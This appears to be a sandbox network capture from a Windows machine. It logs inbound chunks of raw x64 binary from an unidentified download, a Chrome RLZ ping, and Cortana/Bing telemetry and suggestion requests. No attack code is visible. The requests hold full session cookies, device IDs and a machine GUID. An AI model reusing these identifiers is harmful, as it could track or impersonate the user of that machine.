2024-01-26 09:17:12 UTC	16384	IN	Data Raw: 24 ac 00 00 00 41 83 bf 94 11 00 00 02 75 21 49 8b 8f d0 10 00 00 48 85 c9 74 15 41 b8 02 00 00 00 e8 6a 72 01 00 66 2e 0f 1f 84 00 00 00 00 00 41 80 bf 18 01 00 00 00 74 24 41 b8 01 00 00 00 4c 89 e1 48 8d 94 24 ac 00 00 00 e8 70 58 03 00 41 80 bf 19 01 00 00 00 0f 85 52 35 00 00 48 8b 44 24 30 83 38 00 41 bd ff ff ff ff 44 8b 84 24 ac 00 00 00 0f 85 8a 00 00 00 4c 89 f9 48 8b 94 24 a0 00 00 00 e8 16 d2 ff ff 41 bd ff ff ff ff 3d 3f 00 00 80 0f 84 b6 fe ff ff 41 b8 61 d9 00 00 3d 2a 00 00 80 74 54 3d 21 00 00 80 75 4a 44 8b ac 24 ac 00 00 00 eb 43 48 8d 0d 0e 7c 10 00 48 8d 15 2b 57 10 00 41 b8 d3 0e 00 00 e8 2a 65 0b 00 48 85 ff 0f 85 11 ff ff ff 48 8d 0d 8e 2c 10 00 48 8d 15 09 57 10 00 41 b8 d4 0e 00 00 e8 08 65 0b 00 e9 f3 fe ff ff 41 89 c0 44 89 84 Data Ascii: $Au!IHtAjrf.At$ALH$pXAR5HD$08AD$LH$A=?Aa=tT=!uJD$CH\|H+WAeHH,HWAeAD
2024-01-26 09:17:12 UTC	16384	IN	Data Raw: a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff a4 e8 ff ff 19 e2 ff ff be df ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 47 f1 ff ff be df ff ff 53 f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff ff 2f f1 ff Data Ascii: ///////////////////////////////////////GS/////
2024-01-26 09:17:12 UTC	16384	IN	Data Raw: ff ff 48 8d 0d 19 06 10 00 48 8d 15 e2 d7 0f 00 41 b8 86 17 00 00 e8 e1 e5 0a 00 41 f7 c7 00 00 40 00 0f 84 b7 fe ff ff e9 cb fe ff ff cc cc cc 8a 41 08 3a 42 08 75 4b 8a 41 09 3a 42 09 75 43 8a 41 0a 3a 42 0a 75 3b 8a 41 0b 3a 42 0b 75 33 8a 41 0c 3a 42 0c 75 2b 8a 41 0d 3a 42 0d 75 23 8a 41 0e 3a 42 0e 75 1b 8a 41 0f 3a 42 0f 75 13 8b 02 39 01 75 0d 8b 42 04 33 41 04 a9 ff ff ff 0f 74 03 31 c0 c3 4c 63 41 10 8b 42 10 4d 85 c0 74 28 85 c0 74 24 4c 63 c8 4b 8d 04 80 44 8b 04 81 48 8d 0c 81 4f 8d 0c 89 4e 8d 14 8a 31 c0 46 3b 04 8a 4c 89 d2 74 ce eb 06 41 09 c0 0f 94 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 55 53 48 83 ec 38 4c 89 ce 44 89 c3 89 d5 48 89 cf 4c 8b 49 08 4c 3b 09 72 74 48 8b 4f 10 c6 44 24 28 00 48 c7 44 24 20 01 00 00 00 41 Data Ascii: HHAA@A:BuKA:BuCA:Bu;A:Bu3A:Bu+A:Bu#A:BuA:Bu9uB3At1LcABMt(t$LcKDHON1F;LtAVWUSH8LDHLIL;rtHOD$(HD$ A
2024-01-26 09:17:12 UTC	16384	IN	Data Raw: c1 ee 1f 01 c6 d1 fe 48 63 c6 39 2c c2 77 e1 89 f3 72 df 8b 6c c2 04 eb 97 4d 85 c0 0f 84 36 03 00 00 49 8b 4f 18 49 83 f8 08 73 0a 45 31 c9 31 d2 e9 ef 01 00 00 4c 89 c2 48 83 e2 f8 48 8d 42 f8 48 89 c3 48 c1 eb 03 48 83 c3 01 48 85 c0 0f 84 40 03 00 00 48 89 dd 48 83 e5 fe 66 0f ef d2 31 ff 66 0f 6f 1d 86 8a 0c 00 66 0f ef c0 66 0f ef c9 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 66 0f 6e 2c 39 66 0f 6e 74 39 04 66 0f 60 ea 66 0f 61 ea 66 0f 60 f2 66 0f 61 f2 66 0f 6f e0 66 0f ef e3 66 0f 6f fd 66 0f eb fb 66 0f 66 e7 66 0f db c4 66 0f df e5 66 0f eb e0 66 0f 6f e9 66 0f ef eb 66 0f 6f c6 66 0f eb c3 66 0f 66 e8 66 0f db cd 66 0f df ee 66 0f eb e9 66 0f 6e 4c 39 08 66 0f 6e 74 39 0c 66 0f 60 ca 66 0f 61 ca 66 0f 60 f2 66 0f 61 f2 66 0f 6f c4 66 0f ef c3 Data Ascii: Hc9,wrlM6IOIsE11LHHBHHHH@HHf1fofff.@fn,9fnt9f`faf`fafoffofffffffoffofffffffnL9fnt9f`faf`fafof
2024-01-26 09:17:12 UTC	16384	IN	Data Raw: 01 00 00 00 0f 95 c2 48 89 f1 e8 f1 01 03 00 0f b6 fb eb 9e 31 ff 31 c9 ff 15 d2 fb 0f 00 eb 92 31 db 0f b6 fb eb 8b cc cc cc cc cc cc cc cc cc 41 57 41 56 41 55 41 54 56 57 55 53 48 81 ec b8 00 00 00 48 89 4c 24 68 48 8b 05 01 54 10 00 48 31 e0 48 89 84 24 b0 00 00 00 83 fa 10 0f 84 b8 02 00 00 81 fa 11 01 00 00 0f 84 a5 02 00 00 81 fa 10 01 00 00 0f 85 b3 02 00 00 48 8b bc 24 20 01 00 00 48 8b 4c 24 68 ba 31 00 00 00 45 31 c0 45 31 c9 ff 15 ef fb 0f 00 48 89 84 24 88 00 00 00 48 8b 07 48 8b 10 48 85 d2 0f 8e 85 02 00 00 4c 8b 60 10 48 c1 e2 04 4c 01 e2 41 bd 0c 00 00 00 bd 64 00 00 00 31 c0 48 89 44 24 78 48 89 94 24 80 00 00 00 4c 8b 7c 24 68 4c 8b b4 24 88 00 00 00 e9 ac 01 00 00 66 0f 1f 84 00 00 00 00 00 48 b8 50 00 00 00 08 00 00 00 48 89 84 24 a8 Data Ascii: H111AWAVAUATVWUSHHL$hHTH1H$H$ HL$h1E1E1H$HHHL`HLAd1HD$xH$L\|$hL$fHPH$

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:35 UTC	449	OUT	GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000063A36EF620 HTTP/1.1 Host: clients1.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br
2024-01-26 09:17:35 UTC	817	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-d3HDJrkN7ExpgitSVKLdvw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1 Content-Security-Policy: script-src 'report-sample' 'nonce-TixBKMtQ6PkBj5so5qT0sQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1 Content-Type: text/plain; charset=utf-8 Content-Length: 220 Date: Fri, 26 Jan 2024 09:17:35 GMT Expires: Fri, 26 Jan 2024 09:17:35 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-01-26 09:17:35 UTC	220	IN	Data Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 64 36 39 64 62 32 35 38 0a Data Ascii: rlzC1: 1C1ONGR_enUS1094rlzC2: 1C2ONGR_enUS1094rlzC7: 1C7ONGR_enUS1094dcc: set_dcc: C1:1C1ONGR_enUS1094,C2:1C2ONGR_enUS1094,C7:1C7ONGR_enUS1094events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: d69db258

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:38 UTC	2273	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1696585056 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765 X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 907 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=5e4190f4&IPMID=1696585056345&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:38 UTC	907	OUT	Data Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 36 34 38 31 41 46 33 32 31 31 46 30 34 33 44 41 39 30 30 39 46 46 31 30 39 32 45 43 36 45 36 46 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 Data Ascii: <ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>6481AF3211F043DA9009FF1092EC6E6F</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"C
2024-01-26 09:17:38 UTC	476	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 289E7AF2244341FBBC7B9D4F26F2F641 Ref B: BY3EDGE0215 Ref C: 2024-01-26T09:17:38Z Date: Fri, 26 Jan 2024 09:17:38 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260658.4830ea9f

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:38 UTC	881	OUT	GET /manifest/threshold.appcache HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Origin: https://www.bing.com Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=5e4190f4&IPMID=1696585056345&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:38 UTC	875	IN	HTTP/1.1 200 OK Content-Length: 3250 Content-Type: text/cache-manifest; charset=utf-8 Cache-Control: private X-EventID: 65b378b2a2c94a1788e1a955d72270cc UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Fri, 26 Jan 2024 09:17:38 GMT Connection: close Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; domain=.bing.com; expires=Mon, 26-Jan-2026 09:17:38 GMT; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260658.4830eaa7
2024-01-26 09:17:38 UTC	3250	IN	Data Raw: 43 41 43 48 45 20 4d 41 4e 49 46 45 53 54 0d 0a 23 20 56 65 72 73 69 6f 6e 3a 39 61 61 31 30 30 39 65 0d 0a 43 41 43 48 45 3a 0d 0a 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 0d 0a 2f 72 70 2f 68 2d 4f 59 5f 56 6b 36 37 39 6a 65 50 6a 4c 44 70 66 6d 63 56 49 6b 66 44 4f 59 2e 6a 73 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 62 2f 31 39 2f 6a 6e 63 2c 6e 6a 2f 36 68 55 5f 4c 6e 65 61 66 49 5f 4e 46 4c 65 44 76 4d 33 36 37 65 62 46 61 4b 51 2e 6a 73 3f 62 75 3d 44 79 59 76 63 6e 36 42 41 59 51 42 65 33 56 34 74 67 47 35 41 53 2d 70 41 53 2d 38 41 51 26 6f 72 3d 77 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 62 2f 31 63 2f 63 69 72 33 2c 6f 72 74 6c 2c 63 Data Ascii: CACHE MANIFEST# Version:9aa1009eCACHE:/AS/API/WindowsCortanaPane/V2/Init/rp/h-OY_Vk679jePjLDpfmcVIkfDOY.jshttps://r.bing.com/rb/19/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=DyYvcn6BAYQBe3V4tgG5AS-pAS-8AQ&or=whttps://r.bing.com/rb/1c/cir3,ortl,c

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:39 UTC	864	OUT	GET /rb/19/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=DyYvcn6BAYQBe3V4tgG5AS-pAS-8AQ&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E
2024-01-26 09:17:39 UTC	1226	IN	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Wed, 24 Jan 2024 12:41:55 GMT X-EventID: 65b1a716e6ca478ea6f0b8d129a311ac UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: MWHEEEAP002502B X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=312757 Expires: Tue, 30 Jan 2024 00:10:16 GMT Date: Fri, 26 Jan 2024 09:17:39 GMT Content-Length: 21849 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.07a6dc17.1706260659.406dcb6d Timing-Allow-Origin: *
2024-01-26 09:17:39 UTC	15158	IN	Data Raw: 2f 2a 21 44 69 73 61 62 6c 65 4a 61 76 61 73 63 72 69 70 74 50 72 6f 66 69 6c 65 72 2a 2f 0a 76 61 72 20 42 4d 3d 42 4d 7c 7c 7b 7d 3b 42 4d 2e 63 6f 6e 66 69 67 3d 7b 42 3a 7b 74 69 6d 65 6f 75 74 3a 31 65 33 2c 64 65 6c 61 79 3a 37 35 30 2c 6d 61 78 55 72 6c 4c 65 6e 67 74 68 3a 33 30 30 2c 73 65 6e 64 6c 69 6d 69 74 3a 32 30 2c 6d 61 78 50 61 79 6c 6f 61 64 53 69 7a 65 3a 37 65 33 7d 2c 56 3a 7b 64 69 73 74 61 6e 63 65 3a 32 30 7d 2c 4e 3a 7b 6d 61 78 55 72 6c 4c 65 6e 67 74 68 3a 33 30 30 7d 2c 45 3a 7b 62 75 66 66 65 72 3a 33 30 2c 74 69 6d 65 6f 75 74 3a 35 65 33 2c 6d 61 78 55 72 6c 4c 65 6e 67 74 68 3a 33 30 30 7d 2c 43 3a 7b 64 69 73 74 61 6e 63 65 3a 35 30 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 76 74 28 29 7b 69 Data Ascii: /!DisableJavascriptProfiler/var BM=BM\|\|{};BM.config={B:{timeout:1e3,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:7e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:50}},function(n){function vt(){i
2024-01-26 09:17:39 UTC	6691	IN	Data Raw: 6e 64 2c 69 29 2c 70 74 3d 74 28 6f 2e 72 65 71 75 65 73 74 53 74 61 72 74 2c 69 29 2c 77 74 3d 74 28 6f 2e 72 65 73 70 6f 6e 73 65 53 74 61 72 74 2c 69 29 2c 62 74 3d 74 28 6f 2e 72 65 73 70 6f 6e 73 65 45 6e 64 2c 69 29 2c 6f 74 3d 6e 75 6c 6c 2c 73 74 3d 6e 2e 6c 61 79 6f 75 74 28 29 3b 66 6f 72 28 74 74 3d 30 3b 74 74 3c 73 74 2e 6c 65 6e 67 74 68 3b 74 74 2b 2b 29 7b 76 61 72 20 62 3d 73 74 5b 74 74 5d 2c 64 74 3d 62 2e 5f 65 2c 68 74 3d 62 2e 5f 73 3b 69 66 28 68 74 26 26 67 3d 3d 3d 68 74 29 7b 6f 74 3d 62 2e 69 3b 62 2e 78 3c 68 2e 77 26 26 62 2e 79 3c 68 2e 68 26 26 28 66 3d 65 74 29 3b 62 72 65 61 6b 7d 7d 72 74 3d 7b 5f 72 3a 6f 2c 74 3a 65 74 2c 69 3a 70 2e 6c 65 6e 67 74 68 2c 6c 3a 6f 74 2c 68 3a 77 5b 31 5d 2c 70 3a 77 5b 32 5d 2e 6c 65 6e Data Ascii: nd,i),pt=t(o.requestStart,i),wt=t(o.responseStart,i),bt=t(o.responseEnd,i),ot=null,st=n.layout();for(tt=0;tt<st.length;tt++){var b=st[tt],dt=b._e,ht=b._s;if(ht&&g===ht){ot=b.i;b.x<h.w&&b.y<h.h&&(f=et);break}}rt={_r:o,t:et,i:p.length,l:ot,h:w[1],p:w[2].len

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:39 UTC	2385	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=n&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=693df9a8be554bffb57e511bdf55aece&ig=31c6acad4a724daf9f3d6fd3c7e8663f HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1696585056 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765 X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:39 UTC	1065	IN	HTTP/1.1 200 OK Content-Length: 5806 Content-Type: application/json; charset=utf-8 Cache-Control: no-cache, no-store, must-revalidate Expires: -1 Pragma: no-cache X-EventID: 65b378b3bde8488aac6c8e8e0027960c X-AS-SetSessionMarket: de-ch UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Fri, 26 Jan 2024 09:17:39 GMT Connection: close Set-Cookie: _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: 